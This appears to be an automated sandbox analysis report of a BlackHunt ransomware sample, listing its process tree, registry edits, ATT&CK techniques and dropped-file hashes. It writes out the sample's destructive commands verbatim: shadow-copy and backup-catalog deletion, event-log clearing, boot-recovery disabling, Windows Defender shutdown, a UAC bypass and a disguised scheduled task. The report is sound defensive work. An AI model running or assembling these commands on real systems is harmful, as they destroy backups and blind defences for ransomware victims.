9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 49 PID 2364 wrote to memory of 2756 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 49 PID 2364 wrote to memory of 2596 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 53 PID 2364 wrote to memory of 2596 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 53 PID 2364 wrote to memory of 2596 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 53 PID 2364 wrote to memory of 2596 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 53 PID 2364 wrote to memory of 2512 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 57 PID 2364 wrote to memory of 2512 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 57 PID 2364 wrote to memory of 2512 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 57 PID 2364 wrote to memory of 2512 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 57 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe"C:\Users\Admin\AppData\Local\Temp\9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2364 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:1468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2080
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1864
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1824
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1732
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1684
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2248
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:820
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:876
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe" /F2⤵PID:2108
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe" /F3⤵
- Creates scheduled task(s)
PID:1380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1048
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1320
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2648
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2904
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2456
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2336
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:324
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:576
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1832
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1440
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2432
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
- Suspicious use of WriteProcessMemory
PID:1468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2224
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1940
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1616
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1480
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3192
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1508
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1664
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1676
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3772
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2676
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1848
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:112
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3892
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:944
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2116
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2520
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:604
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3108
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1680
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1964
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2748
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1828
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:204
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2736
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3504
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe"2⤵
- Deletes itself
PID:3092 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3744
-
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2684
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2784
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:852
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a8049a4ae45a9c1292553b594df515ef
SHA1e812b1581d6fa001f7a82fef6be663e67e022f51
SHA256e6c20d8b772eb038e695cef423cd2ecb2bf92dc30f2c5148f353bf25f58e80c2
SHA512333b7bca2cdc998137d2b3300d6d2b9c885ebff5782f392bd3f010d0547e140ede563f2cb66066b066394cc56d671dab3e962fb15203aed171551092e403c74b
-
Filesize
12KB
MD50d4ad500ec17ee180d8d5572ae29ffc1
SHA19780756e057cc64c87660a5a1ed8106f627e692c
SHA256c0d34261c04f7cc45742b8cb9efcf107ceed84ff07e3159d54f399e9619a0d25
SHA512d1a2570a501b204b165f289cbd36872ae156338399566881e8da1c1c074cbfd0b6e4d3f3079488c434f895eaedf02b1ba383a9fd802ccb04a05e32b80920c1a9
-
Filesize
684B
MD5795817fa8accbc6723270637a21b06d3
SHA1106188f8d9e36e7274fc7c59823996f57acccb17
SHA256c33c62f2b8e8069e5f73df40c529d3e0038b23b79f37e59f650cf965922a8154
